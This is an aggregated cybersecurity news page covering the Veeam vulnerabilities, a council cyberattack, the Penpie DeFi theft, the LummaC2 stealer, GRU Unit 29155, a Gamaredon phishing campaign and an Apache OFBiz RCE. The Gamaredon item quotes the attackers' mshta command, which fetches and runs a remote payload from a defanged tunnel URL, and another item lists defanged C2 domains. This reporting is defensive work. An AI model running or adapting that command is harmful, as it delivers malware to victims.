Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Veeam Security Bulle ...

 Firewall Daily

Veeam has published a new Security Bulletin addressing multiple critical vulnerabilities across its suite of products. The Veeam security bulletin, identified as KB ID: 4649, includes updates on Veeam Backup & Replication, Veeam ONE, Veeam Service Provider Console, Veeam Agent for Linux, Veeam Backup for Nutanix   show more ...

AHV, and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization. The security issues detailed in this bulletin highlight several high-severity vulnerabilities that could impact the security and functionality of Veeam’s solutions. This article provides a short glimpse into these updates offered by the Veeam security bulletin.  Key Highlights from the Veeam Security Bulletin Here's a detailed look at the vulnerabilities discovered and their respective fixes: 1. Veeam Backup & Replication Several vulnerabilities affecting Veeam Backup & Replication 12.1.2.172 and earlier versions have been reported. These vulnerabilities include: CVE-2024-40711: This critical vulnerability allows unauthenticated remote code execution (RCE). Discovered by Florian Hauser of CODE WHITE GmbH, it carries a CVSS v3.1 score of 9.8. CVE-2024-40713: A high-severity vulnerability enabling a low-privileged user to alter Multi-Factor Authentication (MFA) settings, thus bypassing MFA. It has a CVSS v3.1 score of 8.8. CVE-2024-40710: This series of high-severity vulnerabilities allow remote code execution (RCE) under the service account and extraction of sensitive information. It also scores 8.8 on the CVSS v3.1 scale. CVE-2024-39718: Allows low-privileged users to remotely delete files on the system with service account permissions. It holds a CVSS v3.1 score of 8.1. CVE-2024-40714: A high-severity vulnerability in TLS certificate validation can let an attacker intercept sensitive credentials during restore operations, scoring 8.3 on the CVSS v3.1 scale. CVE-2024-40712: This path traversal vulnerability permits local privilege escalation (LPE) for an attacker with low-privileged access. It carries a CVSS v3.1 score of 7.8. The solutions for these issues are included in Veeam Backup & Replication version 12.2 (build 12.2.0.334). 2. Veeam Agent for Linux For Veeam Agent for Linux, version 6.1.2.178 and earlier are affected by: CVE-2024-40709: This high-severity vulnerability enables local privilege escalation to the root level and scores 7.8 on the CVSS v3.1 scale. This issue is resolved in Veeam Agent for Linux version 6.2 (build 6.2.0.101), which is included with Veeam Backup & Replication 12.2. 3. Veeam ONE Veeam ONE 12.1.0.3208 and earlier versions are affected by several vulnerabilities: CVE-2024-42024: Allows remote code execution on the Veeam ONE Agent machine with possession of service account credentials. It has a CVSS v3.1 score of 9.1. CVE-2024-42019: Grants access to the NTLM hash of the Veeam Reporter Service account, requiring user interaction. It scores 9.0 on the CVSS v3.1 scale. CVE-2024-42023: Enables low-privileged users to execute code with Administrator privileges remotely, with a severity score of 8.8. CVE-2024-42021: Allows attackers with valid access tokens to access saved credentials, scoring 7.5 on the CVSS v3.1 scale. CVE-2024-42022: Allows modification of product configuration files, also scoring 7.5. CVE-2024-42020: HTML injection vulnerability in Reporter Widgets, scoring 7.3. These vulnerabilities are addressed in Veeam ONE v12.2 (build 12.2.0.4093). 4. Veeam Service Provider Console The Veeam Service Provider Console (VSPC) 8.0.0.19552 and earlier versions have been identified with: CVE-2024-38650: A critical vulnerability permitting low-privileged attackers to access the NTLM hash of the service account on the VSPC server, scoring 9.9 on the CVSS v3.1 scale. CVE-2024-39714: Allows low-privileged users to upload arbitrary files, leading to remote code execution on the VSPC server. This issue also scores 9.9. CVE-2024-39715: Similar to CVE-2024-39714 but through REST API access, with a high severity score of 8.5. CVE-2024-38651: Allows low-privileged users to overwrite files, leading to remote code execution, with a CVSS v3.1 score of 8.5. The fixes are included in Veeam Service Provider Console v8.1 (build 8.1.0.21377). 5. Veeam Backup for Nutanix AHV and Other Plug-Ins Veeam Backup for Nutanix AHV Plug-In 12.5.1.8 and earlier, as well as Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.4.1.45, are impacted by: CVE-2024-40718: Allows local privilege escalation through an SSRF vulnerability, with a severity score of 8.8 on the CVSS v3.1 scale. These issues are resolved in Veeam Backup for Nutanix AHV Plug-In v12.6.0.632 and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In v12.5.0.299, both included with Veeam Backup & Replication 12.2. Conclusion This comprehensive Veeam Security Bulletin outlines critical updates and fixes for multiple Veeam products. Users are advised to update to the latest versions of Veeam Backup & Replication, Veeam Agent for Linux, Veeam ONE, Veeam Service Provider Console, and other related products to mitigate these vulnerabilities. Regular updates and vigilant security practices remain essential in protecting against potential threats and ensuring the integrity of data protection solutions.

image for Tewkesbury Council S ...

 Firewall Daily

Tewkesbury Borough Council has declared a major incident following a cyberattack that disrupted its operations on Wednesday afternoon. The Tewkesbury Borough Council prompted the council to take immediate action by shutting down its systems to contain the Tewkesbury Borough Council cyberattack.  As the investigation   show more ...

unfolds, the council's Chief Executive, Alistair Cunningham, has reassured the public that there is currently no evidence of data being removed or exfiltrated from their systems. Tewkesbury Borough Council Cyberattack: Immediate Response and Ongoing Investigation Upon discovering the Tewkesbury Borough Council cyberattack, Tewkesbury Borough Council enacted "necessary cyber response steps" to address the situation. The council's action included shutting down all systems to prevent further potential damage.  An ongoing investigation is being conducted with assistance from the National Cyber Security Centre and the counter-fraud agency. The council has emphasized that there is no indication of personal data being compromised at this time. In an official statement, the council provided precautionary advice to residents and customers, urging them to remain vigilant. The advisory highlights the importance of being cautious of phishing emails and fraudulent activities, using strong and unique passwords, and promptly changing passwords if any suspicious activity is detected. The council also recommended checking further guidance available on the National Cyber Security Centre's website. Public Communication and Support In a statement to BBC Radio Gloucestershire, Cunningham detailed the discovery of unknown user accounts within the council’s system, which led to the immediate system shutdown. He confirmed that there was no evidence suggesting that data had been removed or exfiltrated. Cunningham stressed that the primary focus is on ensuring services for vulnerable residents while investigating the extent of the Tewkesbury Borough Council cyberattack. "We have now re-established our phone line and are working on building new computers to expand our phone line capabilities," Cunningham said. He also pointed out that although the council's website remains operational and unaffected, normal services are limited. I don't want someone who's at risk of losing their house or who can't feed their children not to be able to talk to my staff," Cunningham added. To assist residents, council staff will be available at several locations: Bishop’s Cleeve Parish Council until 15:00 BST Churchdown police bus at Tesco car park until 16:00 BST Brockworth Community Centre at Court Road until 16:00 BST Data Protection and Community Assurance The council has appointed Graeme Simpson as the Data Protection Officer to handle inquiries related to the cyberattack on Tewkesbury Borough Council. Residents concerned about the data breach can contact Simpson via the email address provided in the council's communication. Despite the current challenges, the council is committed to providing updates and ensuring that residents are informed of any potential risks to their data. As part of its ongoing response, the council continues to work diligently to understand the full scope of the cyberattack. "We do not know the extent of the infiltration of our system," Cunningham admitted. He emphasized the importance of not reopening all services until a thorough assessment is completed, citing that waste and recycling services remain operational during this period. The Cyber Express reached out to Tewkesbury Borough Council for further details on the cyberattack. As of now, no additional official statements have been provided. 

image for Penpie DeFi Hack: $2 ...

 Hacker News

The decentralized finance (DeFi) ecosystem has been rocked by another major security breach. Penpie, a protocol built on the Pendle platform, suffered a hack on September 3, 2024. The protocol informed that the breach resulted in the theft of approximately $27 million worth of cryptocurrency. This Penpie Defi Hack   show more ...

adds to the already concerning rise in crypto scams, pushing total losses for 2024 past the staggering $1.2 billion mark. Details of the Penpie DeFi Hack The Penpie post-mortem report sheds light on some specifics of the exploit. It reveals that the attacker leveraged a vulnerability in Penpie's reward distribution mechanism. This vulnerability allowed the attacker to deploy a malicious smart contract, categorized as an "evil market," that inflated the attacker's staking balance on the platform. By manipulating this balance, the attacker could claim a significantly larger share of rewards than intended, ultimately draining millions of dollars worth of crypto assets. Following the hack, the blockchain suspended all deposits and withdrawals, effectively halting operations to prevent further losses. The team also filed complaints with both the Singapore police and the FBI. They also sent a message to the hacker promising a negotiated bounty payment in exchange for the safe return of funds. “We acknowledge your exploit of our protocol,” they wrote. “Please contact us to discuss terms confidentially. No legal action will be pursued if the funds are returned. Let’s find a mutually beneficial solution.” [caption id="attachment_89338" align="alignnone" width="738"] Penpie's Appeal to Hacker. Source: X[/caption] Euler Finance Cybercriminal Lauds Penpie Hacker Soon after the incident, reports emerged that the Penpie hacker quickly moved a significant portion of the stolen funds – around $7 million – through the crypto mixer Tornado Cash. These mixers are designed to obfuscate the origin and destination of cryptocurrency transactions, making them a popular tool for criminals seeking to launder ill-gotten gains. Following the crypto hack, another infamous Euler Finance hacker, responsible for a $195 million DeFi heist in 2023, left on the blockchain. The message, directed at the Penpie hacker, expressed praise for their decision not to return the stolen funds. “Good job bro. I didn’t see a hack like this for a while. I’m happy you kept all the money and didn’t let these bastards get back one dollar of what you took. You won, they lost. Good job,” they wrote. [caption id="attachment_89339" align="alignnone" width="1338"] Cybercriminal Lauds Penpie Hacker. Source: X[/caption] Over 9,000 Victims in August Due to Cyrpto Phishing Scams: Report Unfortunately, the Penpie incident is just one in a series of major DeFi hacks in 2024. The cryptocurrency landscape continues to be plagued by cyberattacks, with the total value of stolen funds in 2024 surpassing $1.21 billion. This represents a 15.5% increase compared to the previous year, according to a report by Immunfi. The losses are spread across 154 separate incidents, with the majority occurring in the DeFi space. August 2024 was particularly alarming for crypto investors, as hackers exploited various vulnerabilities to steal millions of dollars. Two major attacks during this period resulted in the theft of approximately $238 million in Bitcoin and $55 million in Dai. [caption id="attachment_89341" align="alignnone" width="900"] Source: Scam Sniffer Report[/caption] Phishing scams also saw a significant surge in August, with Scam Sniffer reporting a 215% increase in stolen funds compared to the previous month. Over 9,000 victims fell prey to these scams, losing about $63 million. A single large-scale phishing attack accounted for the majority of these losses, with approximately $55 million stolen. Regulation and the Future of DeFi The increasing frequency of DeFi hacks has also sparked discussions surrounding potential regulations. While some advocate for a more hands-on approach from regulatory bodies, others argue that such measures may stifle innovation and the core principles of DeFi. Finding the right balance between security and innovation remains a challenge. However, it's clear that addressing security vulnerabilities will be essential for fostering long-term trust and stability in the DeFi ecosystem.

image for OnlyFans Hack Target ...

 Firewall Daily

In a surprising twist of digital irony, researchers have uncovered a sophisticated operation that preys on aspiring OnlyFans hackers as victims, demonstrating a ruthless cybercrime ecosystem which sometimes cannibalizes upon itself. The hacking tool had been distributed as an OnlyFans 'checker' tool, checker   show more ...

tools offer the ability to test the validity of stolen credentials en masse. However, this tool was laced with the Lummac Stealer malware. OnlyFans Checker and Lummac Stealer The OnlyFans checker tool claims to allow cybercriminals the capability to validate stolen username/password combinations, check account balances, verify if accounts have payment methods attached, and determine if accounts have creator privileges.  However, as the investigation from Veriti's research team reveals, sometimes these tools function as Trojan horses wih the aim of targeting cybercriminals who download and seek to use them. The researchers note that Lummac Stealer, also known as LummaC2 Stealer, is not a typical run-of-the-mill malware. The malware had first emerged in August 2022, and had been developed by the threat actor 'Shamel'/ 'Lumma,' and shared to the wider cybercriminal audience under a Malware-as-a-Service (MaaS) model. The technical sophistication in the malware's operation, primary targets, and advanced loader capabilities make it an advanced malware threat with the capability to adapt and evolve its attack tactics through the operation. The researchers further noted that the threat actor, 'Bilalkhanicom', has launched parallel campaigns  targeting cybercriminals that aim to crack Disney+ accounts, Instagram hackers, and even botnet wranglers. The distributed executables for these campaigns aim to flip the script on unsuspecting criminals. Upon execution, the hidden malware links to a GitHub account operating with the username 'UserBesty,' that had been created only days ago. The Github account was observed serving as a repository for various additional malicious payloads. One of these payloads 'brtjgjsefd.exe,' is designed to deeply embed itself within the target's system system environment to create exclusions against security detection tools, making it even harder to detect and neutralize. Geopolitical Enigma In a final twist, the researchers discovered multiple potential geopolitical links deeply hidden within the malware's architecture, with its folder names indicating East Asian, African, Celtic, and Indigenous Latin American roots: 'Hiyang' and 'Reyung suggest East Asian connections 'Zuka' suggest African influences 'Lir' suggests Celtic mythology Popisaya' suggests Indigenous Latin American roots The researchers were also able to trace the malware's operational communication activities to several newly registered .shop domains with each one having a high detection rate. Domains such as caffegclasiqwp(.)shop and ponintnykqwm(.)shop, served as reliable command-and-control (C2) servers to orchestrate the malware's activities. The researchers note this campaign as an act of ingenious cyber-deception that demonstrates that everyone, even cybercriminals need to maintain active cybersecurity measures.

image for Russian Cyber Unit 2 ...

 Cybersecurity News

The United States, along with its allies, has formally identified a group of Russian hackers, tracked under names like Cadet Blizzard and Ember Bear, as being responsible for large-scale attacks on the US global critical infrastructure. These hackers are linked to Unit 29155 of Russia's Main Directorate of the   show more ...

General Staff of the Armed Forces (GRU), a military intelligence unit that has long been under scrutiny for its covert operations. In a joint advisory released by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA), it was revealed that the GRU hackers, often junior officers from GRU’s 161st Specialist Training Center, have been involved in cyber sabotage since 2020, with the leadership and oversight of the experienced members of Unit 29155. These operations have not only targeted critical infrastructure but also carried out sabotage and assassination attempts throughout Europe. WhisperGate Malware and Cyberattacks The group gained significant notoriety in January 2022 when they deployed WhisperGate, a data-wiping malware, against Ukrainian organizations. The attacks were part of a broader campaign aimed at destabilizing Ukraine and interfering with the efforts of NATO and allied nations to support the country. This malware was a signal of the hackers' capabilities, marking a shift from cyber-espionage to outright data destruction. WhisperGate attacks began on January 13, 2022, focusing on disrupting Ukraine’s defense and critical services. The joint advisory emphasizes that Unit 29155 is distinct from other well-known GRU-affiliated units, such as Units 26165 and 74455, which were responsible for previous cyberattacks in Europe and the U.S. Since early 2022, this group has pivoted its focus toward disrupting aid efforts for Ukraine, expanding its cyber toolkit to include methods that blend espionage with destruction. The joint advisory stresses that the hackers are honing their technical skills and building their experience by conducting more advance cyber operations across various global regions. Unit 29155: A Wide Range of Attacks Across Continents According to U.S. intelligence, Unit 29155 has been responsible for a wide range of cyberattacks that have affected NATO countries, along with others in North America, Europe, Latin America, and Central Asia. Their tactics have included website defacement, public leaks of stolen data, and extensive infrastructure scanning to uncover vulnerabilities. These attacks have not been limited to Ukraine but have spread across multiple sectors, including energy, government services, and financial institutions. As a result, critical infrastructure across NATO member states has faced increasing risks of being compromised. The FBI has been tracking the activities of Unit 29155 closely, having detected over 14,000 domain scanning attempts targeting at least 26 NATO members and several European Union (EU) nations. These scans were aimed at identifying weaknesses in critical systems that could be exploited in future attacks. U.S. Offers Reward for Key GRU Officers In response to these attacks, the U.S. State Department announced a reward of up to $10 million for information leading to the identification or capture of five Russian military intelligence officers. These individuals are believed to be part of the GRU's Unit 29155 and include Vladislav Borovkov, Denis Igorevich Denisenko, Yuriy Denisov, Dmitry Yuryevich Goloshubov, and Nikolay Aleksandrovich Korchagin. [caption id="attachment_89265" align="aligncenter" width="1024"] Source: X[/caption] These officers are accused of carrying out cyber operations that have harmed critical U.S. infrastructure, with particular emphasis on energy, government, and aerospace sectors. Their cyber activities are linked to the sabotage of Western countries’ efforts to support Ukraine and disrupt various sectors critical to national security. In addition to the military officers, a civilian named Amin Timovich has also been indicted for his involvement in the WhisperGate attacks against Ukraine. This indictment, along with charges against the five GRU officers, highlights the seriousness of Russia’s cyber operations and the coordinated efforts to bring those responsible to justice. [caption id="attachment_89266" align="aligncenter" width="739"] Source: X[/caption] Protecting Critical Infrastructure: Recommendations As Unit 29155 continues its cyber operations across the globe, organizations within critical infrastructure sectors are urged to enhance their defenses. Immediate actions recommended by cybersecurity authorities include: Patching vulnerabilities in systems to close potential entry points for cyberattacks. Implementing phishing-resistant multifactor authentication (MFA) to strengthen account security, particularly for services like webmail and virtual private networks (VPNs). Segmenting networks to contain any malicious activity should an intrusion occur. These defensive strategies are especially important for organizations within sectors frequently targeted by Russian hackers, including energy, transportation, healthcare, and government services. Global Concerns and Long-Term Implications Since Russia’s invasion of Ukraine in February 2022, cyberattacks have escalated in both scale and severity. Alongside the WhisperGate malware, other destructive tools like HermeticWiper and ransomware decoys have been used to cripple Ukrainian systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI warned early on that such malware could easily spread beyond Ukraine, affecting global systems if defenses were not adequately prepared. Wednesday’s announcement of the U.S. seizing 32 web domains linked to Russian disinformation campaigns highlights the broader cyber and information warfare being waged by Russia. These domains were part of a network aimed at spreading false information to influence the upcoming 2024 U.S. presidential election. Tracking Cyber Threats: Industry and Government Coordination The cybersecurity industry plays a critical role in identifying and mitigating threats posed by groups like Unit 29155. Leading cybersecurity firms and government agencies continuously track the activities of Russian cyber actors, with various naming conventions such as Cadet Blizzard (tracked by Microsoft) and Ember Bear (CrowdStrike). These cyber groups have demonstrated advanced capabilities in reconnaissance, scanning, and exploiting vulnerabilities in critical systems. As Unit 29155 continues its cyber operations, the global community remains on high alert. Efforts to strengthen critical infrastructure and improve cyber defenses have never been more critical. While the hunt for the Russian GRU officers involved in these attacks intensifies, the larger challenge remains how to effectively mitigate and defend against the growing cyber threats facing the world today.

image for Gamaredon APT Launch ...

 Firewall Daily

A sophisticated spear-phishing campaign orchestrated by the Gamaredon APT group has emerged as a threat to Ukrainian military personnel. Cyble Research and Intelligence Labs (CRIL) has revealed this extensive operation, which capitalizes on spear-phishing emails to compromise sensitive military systems. Gamaredon,   show more ...

also known as Primitive Bear or Armageddon, is a Russian-affiliated Advanced Persistent Threat (APT) group with a long history of targeting Ukrainian government institutions and critical infrastructure. Active since at least 2013, Gamaredon has been notorious for its cyber-espionage activities. Despite the relatively low sophistication of their tools, the group's persistent focus on specific geopolitical targets has led to numerous successful attacks. An Overview of the Gamaredon Campaign The latest campaign by Gamaredon reflects an escalation in their tactics and scope. CRIL’s recent analysis reveals that the group is employing spear-phishing emails to deliver malicious payloads aimed at Ukrainian military personnel. This campaign leverages spear-phishing emails to distribute harmful content, demonstrating a clear pattern of coordinated and large-scale cyberattacks. [caption id="attachment_89329" align="alignnone" width="1024"] Gamaredon Sample Observed in the Wild (Source: Cyble)[/caption] The spear-phishing emails at the heart of this Gamaredon campaign are designed to deceive recipients into executing malicious files. The emails are themed around military summons, with subjects such as “ПОВІСТКА” (which translates to "summons"). Each email contains a malicious XHTML attachment, crafted to initiate a series of damaging actions when opened. Upon activation, the XHTML file executes obfuscated JavaScript code. This script, hidden within a div element with an id set to “jwu,” utilizes Base64 encoding and random characters to obscure its true intent. The obfuscation is a deliberate tactic to evade detection by security systems. The JavaScript code runs silently, downloading a RAR compressed folder into the victim’s Downloads directory. This folder is designed to appear as a legitimate file, further tricking the user. The downloaded RAR file contains a Windows shortcut (LNK) file. When executed, this shortcut initiates the running of a remote .tar archive. The Gamaredon group has employed TryCloudflare’s one-time tunnel feature to host these malicious files. By leveraging TryCloudflare, the attackers can use a temporary, anonymous tunnel to access resources and deploy their payloads without traditional detection methods. The specific command executed by the LNK file is: “C:WindowsSystem32mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f” This command directs the system to retrieve and run the malicious .tar file from the TryCloudflare domain. The Gamaredon Campaign's Scale and Impact The ongoing Gamaredon campaign is notable for its large-scale and sophisticated execution. The frequency and volume of spear-phishing emails indicate a highly coordinated effort. The use of TryCloudflare’s one-time tunnel feature highlights the group's ingenuity in circumventing traditional cybersecurity measures. A key component of this campaign is the inclusion of a 1-pixel remote image within the malicious files. This image acts as a tracking mechanism, allowing the attackers to monitor interactions with their phishing content and gauge the effectiveness of their attacks. While CRIL’s investigation was unable to retrieve the contents of the .tar files, analyses from other cybersecurity experts, such as Cisco Talos, suggest that these archives likely contain additional malicious payloads designed to exfiltrate sensitive information from compromised systems. Implications for Cybersecurity and Recommendations To counteract sophisticated spear-phishing attacks, organizations, particularly those in sensitive sectors like the military, must adopt comprehensive cybersecurity strategies. First, user training is essential. Educating users on how to recognize spear-phishing attempts, especially those involving unexpected military-themed attachments or messages, is crucial. Awareness plays a significant role in reducing the success rate of such attacks. Advanced email security is another critical component. Implementing email security solutions with advanced threat protection capabilities helps filter out phishing emails and malicious attachments effectively. In addition, deploying robust anti-malware solutions is necessary. These tools should be capable of detecting and blocking obfuscated JavaScript code and malicious LNK files. Regular updates and scans are essential for maintaining protection against online threats. Network monitoring is also vital. Keeping an eye out for unusual network activity, such as connections to TryCloudflare’s one-time tunnels or other unknown external resources, helps in the early detection of anomalies, which can prevent further infiltration. Application whitelisting should be used to allow only trusted applications and scripts to run on systems. This measure helps prevent the unauthorized execution of potentially harmful files. Lastly, leveraging threat intelligence platforms is important for blocking known malicious domains, including those abused by groups like Gamaredon. Staying updated with the latest threat intelligence provides an edge in preemptively countering cyberattacks. The Gamaredon campaign represents a significant escalation in cyber threats targeting Ukrainian military personnel. Through the use of spear-phishing emails, malicious XHTML attachments, and advanced evasion techniques like TryCloudflare’s one-time tunnel feature, Gamaredon continues to refine and intensify its attacks. The persistence and scale of this campaign highlight the importance of maintaining vigilant and proactive cybersecurity measures.

image for 4 Ways to Future-Pro ...

 Cyber Essentials

From small businesses to giant corporations, sophisticated cyberattacks are not just prevalent but effective at crippling data and services. To safeguard your business against these cybersecurity threats, you must take a holistic approach that spans strong security measures such as cyber insurance coverage and   show more ...

protection. Cybersecurity Threats Explained The first part of securing your business is knowing the different cybersecurity threats that can come at you. Common threats include: Phishing Attacks: Cybercriminals take up the guise of trustworthy sources to send fictitious emails and get employees to share sensitive information. Malware: Software intended to damage or disable computer systems on a network. Ransomware: Malicious software that encrypts data and extorts a ransom for its release. Data Breach: A data breach leads to unauthorized access to confidential information, often involving data theft or exposure. DDoS Attacks: Using traffic to overwhelm a service so it cannot function properly. An important part is knowing how these threats can work to devise countermeasures. The proper thing to do in this case is implement strong cybersecurity so your business cannot be hacked. Steps to Implement Strong Cybersecurity 1. Secure Your Network Protect your network from unauthorized access by securing them with firewalls, encryption, and secure Wi-Fi connections. Ensure regular maintenance of your software and hardware to plug areas that cybercriminals can take advantage of. 2. Strong Password Policies Enforce strong password policies that mandate employees to use complex passwords and change them periodically. Urge members to opt for multi-factor authentication (MFA) helping ensure increased security. 3. Regular Software Updates Try to keep everything updated, from operating systems to applications. Scheduled updates usually included patches for potential security risks. 4. Employee Training Train your employees on cybersecurity. Basic instructional courses on how to identify phishing emails, not reuse passwords, and maintain secure practices around software applications can be regularly implemented for a couple of minutes at the beginning before your other critical coursework discussions. 5. Data Encryption This applies to encrypting all sensitive data in transit and at rest. This keeps the data (even if captured in transit) unreadable unless you have that decryption key. 6. Backup Data Regularly Backup your data on an ongoing basis to a secure location If you experience a ransomware attack or data breach, backups also provide options for restoring your info offline instead of paying to retrieve it. 7. Access Control Control exposure to sensitive data by role-based employees follows the principle of least privilege by allowing workers to access only data they need for their job responsibilities. Cyber Security Insurance The importance of having strong cybersecurity defenses in place notwithstanding, planning for failure following a cyberattack is essential as well. Cybersecurity insurance helps address this requirement. There are types of insurance, generally called cyber security insurance or cyber liability insurance, that can be written into a policy to help protect businesses against the impact of these events. This includes the cost of the following things Data Breach Notification: The policy provides coverage for the costs associated with notifying affected parties of a data breach. Legal Fees: These are your costs to have a legal professional represent you and remain in compliance with applicable laws. RanPSW Payments: In case of a ransomware attack, insurance can contribute to the ranPSW recovery. Business Interruption: Payments for lost income resulting from a cyberattack shutting down business operations. Costs of implementing a crisis management plan for public relations to manage the aftermath of a cyber incident. Why is Cyber Security Insurance Needed? Cyberattacks can lead to huge financial losses. Cyber security insurance acts as a financial backstop, resulting in economic protection for your business to recover without breaking the bank. Reputation Management: The reputation of your business is at stake due to a cyberattack. Insurance may cover public relations work to restore trust with customers and stakeholders Maintain peace of mind: With your business being secured by cyber security insurance, know that you can move on to the next challenge such as growth or innovation. Well, having a dedicated developer and following the best programming practices could serve as your shield against security failures (which is not attending quickly enough in case there is an intrusion), even the most knowledgeable programmer should prepare himself on what exactly he will do if his site does get hacked. A clear incident response plan is imperative for dealing with the fallout of a cyber attack. Your plan should include: Preparation: Create a cybersecurity team and conduct regular practice sessions Detection: Set up monitoring to catch possible intruders Contain: Immediately shut down infected systems to prevent the attack from spreading Removal: Take the malware off your network, and patch any security holes Recovery: Return to normal operations by restoring systems, applications, and data from backups Insights Gained: Review the incident and what was learned, to further strengthen corporate defenses against future attacks. Keeping your company secure in the digital era means implementing comprehensive cybersecurity protocols, training employees, and making sure to have cyber security coverage. You can get your business ready for the ever-changing game of cyber threats if you know what to look out for and how to protect yourself! Cybersecurity insurance is one of the best ways to make sure that your business has a backup plan in case things don't go as planned.

image for SEC Accuses Former C ...

 Cybersecurity News

The US Securities and Exchange Commission (SEC) has accused a former CIRCOR executive of misleading financial disclosures. The allegations revolve around false statements made regarding the company's finances. This case highlights the importance of accurate and transparent financial reporting. The U.S. The SEC has   show more ...

filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. Bowerman is accused of misleading financial disclosures, specifically making false statements about the company's finances. This case emphasizes the significance of precise and transparent financial reporting practices. (SEC) announced that it has filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. According to the SEC, Bowerman’s fraudulent activities led to misleading financial disclosures by the company from 2019 through 2021, impacting CIRCOR’s public financial statements. The SEC also revealed that CIRCOR has settled related internal accounting charges, citing deficiencies in its financial controls that contributed to the situation. The Allegations Against Bowerman Bowerman, who was employed at Pipeline Engineering, a U.K.-based business unit of CIRCOR, is accused of engaging in a range of fraudulent practices over two years. The SEC’s complaint asserts that between 2019 and 2021, Bowerman manipulated Pipeline Engineering’s internal financial records, leading to inaccurate figures being incorporated into CIRCOR’s consolidated financial statements. To carry out his fraudulent actions, Bowerman is alleged to have taken multiple deceptive steps, including manipulating account reconciliations, falsifying certifications, fabricating bank confirmation documents, and actively misleading CIRCOR’s senior management and external auditors. The SEC claims that these efforts concealed the true financial position of the business unit and resulted in CIRCOR’s public financial disclosures overstating its performance by millions of dollars for fiscal years 2019 and 2020, as well as for the nine-month period ending on October 3, 2021. CIRCOR’s Internal Control Failures In addition to the charges against Bowerman, the SEC’s findings also highlight broader issues within CIRCOR’s internal accounting systems. According to the SEC’s order, the company lacked sufficient internal controls to properly oversee its financial statement preparation, account reconciliation processes, and access to bank accounts. These gaps in oversight allowed Bowerman’s fraudulent activities to go undetected for an extended period. The SEC’s investigation revealed that CIRCOR’s inability to detect Bowerman’s misconduct contributed to the company’s overstated financial performance during the two-year period in question. The company was found to have violated the federal securities laws’ financial reporting, books and records, and internal accounting controls provisions. CIRCOR’s Response and Remedial Measures In response to the discovery of the fraudulent activities, CIRCOR took immediate action. The company self-reported the financial reporting violations to the SEC shortly after launching its own internal investigation. This proactive cooperation played a significant role in mitigating the SEC’s enforcement actions against CIRCOR. The SEC acknowledged CIRCOR’s extensive cooperation throughout the investigation, noting that the company provided detailed examples of Bowerman’s unauthorized financial adjustments, shared summaries of interviews with witnesses based outside the U.S., and made its employees and external forensic accountants available for questioning. The company also promptly implemented a range of remedial measures to address the identified deficiencies in its internal controls. Key actions taken by CIRCOR included: Strengthening its internal accounting controls. Hiring additional experienced finance and accounting personnel. Cancelling compensation that was scheduled to be paid to a former executive officer. These actions, coupled with CIRCOR’s cooperation with the SEC, led the Commission to decide against seeking a civil penalty against the company. According to Nicholas P. Grippo, Director of the SEC’s Philadelphia Regional Office, “While this matter involves serious violations of the securities laws, once the company became aware of the violations, it promptly self-reported, cooperated, and remediated the gaps in its accounting systems. As also reflected in other recent Commission resolutions, this kind of response by a corporate entity can lead to significant benefits including, as here, no penalty.” Charges Against Bowerman While CIRCOR has settled its case with the SEC, Bowerman faces a more severe set of legal consequences. The SEC has filed a complaint in the U.S. District Court for the District of Massachusetts, charging Bowerman with violations of multiple provisions of the federal securities laws, including those related to antifraud, financial reporting, books and records, and internal accounting controls. The SEC is seeking various forms of relief from Bowerman, including: Injunctive relief to prevent him from engaging in further securities law violations. Disgorgement of any ill-gotten gains, along with prejudgment interest. Civil penalties to further hold Bowerman accountable for his actions. These charges reflect the seriousness of Bowerman’s alleged misconduct, which undermined the integrity of CIRCOR’s financial disclosures and harmed investors who relied on the company’s public filings. As part of the SEC’s final order against CIRCOR, the company has agreed to cease and desist from future violations of the charged provisions of the securities laws.

image for Critical RCE Vulnera ...

 Vulnerability News

Popular open-source enterprise Resource Planning (ERP) system, Apache OFBiz, recently discovered harboring a critical Remote Code Execution (RCE) vulnerability. Tracked as CVE-2024-45195, the Apache OFBiz vulnerability could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers running   show more ...

OFBiz. Thankfully, the Apache security team has addressed the issue in the latest update, urging users to patch their installations immediately. Understanding the Apache OfBiz RCE Vulnerability (CVE-2024-45195) The vulnerability, discovered by Rapid7 security researchers, stems from missing authorization checks within the OFBizEweb application. This weakness, categorized as a forced browsing vulnerability, exposes restricted paths to unauthenticated direct request attacks. "An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server," 1 explained security researcher Ryan Emmons in a report. In simpler terms, an attacker could potentially exploit this vulnerability by crafting a specially designed URL that bypasses authentication protocols. If successful, this could grant the attacker the ability to execute malicious code on the server, potentially leading to complete system compromise. Potential Consequences of the Exploit The consequences of exploiting CVE-2024-45195 could be severe for organizations relying on OFBiz. Here are some potential risks: Data Theft and Leakage: Attackers could gain access to sensitive information stored on the server, including customer data, financial records, and intellectual property. Disruption of Operations: The execution of malicious code could disrupt critical business processes, leading to downtime and financial losses. Lateral Movement and Persistence: Exploiting this vulnerability could be a stepping stone for attackers to gain a foothold in the network and launch further attacks within the system. Apache Patches Flaw The Apache Software Foundation (ASF) has released a patch (version 18.12.16) that addresses CVE-2024-45195. This update strengthens the authorization checks within the OFBiz application, preventing unauthorized access to restricted paths. Emmons explained that CVE-2024-45195 patch is a bypass for three other OFBiz vulnerabilities that have been addressed in the past few months and are tracked as CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856. CVE-2024-32113 had been exploited in attacks using the Mirai botnet, highlighting the serious risks associated with such flaws. Meanwhile, CVE-2024-38856 was rated with a CVSS score of 9.8 by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) , classifying it as critical in severity. The vulnerability allowed attackers to execute remote code without prior authentication, posing a severe risk to affected systems. Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause," Emmons said. All of them are caused by a controller-view map fragmentation issue that enables attackers to execute code or SQL queries and achieve remote code execution sans authentication. The latest patch put in place 